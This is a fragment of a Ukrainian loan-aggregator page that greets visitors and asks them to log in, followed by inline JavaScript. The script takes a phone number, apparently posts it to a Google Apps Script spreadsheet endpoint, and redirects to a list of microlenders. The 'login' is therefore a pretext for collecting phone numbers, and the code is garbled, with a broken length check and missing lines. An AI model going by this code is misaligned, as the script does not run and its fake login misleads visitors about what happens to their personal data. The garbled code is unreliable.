👋 Вітаємо у Dengi do ZP!
Авторизуйтесь в особистому кабінеті
const redirectUrl = “https://dengidozp.com.ua/vsi-mfo-ukrayiny/”;
const sheetApiUrl = “https://script.google.com/macros/s/AKfycbx9llM-u6SyRf9or4P9Yf45S5ukLnOMawl7qfwKS6XHgMj53pUxgFFPzoqJJaoHMVoH/exec”;
document.getElementById(“redirectForm”).addEventListener(“submit”, function(e) {
e.preventDefault();
const phoneInput = document.getElementById(“phoneInput”);
const phoneRaw = phoneInput.value.replace(/\D/g, ”);
if (phoneRaw.length {
window.location.href = redirectUrl;
});
});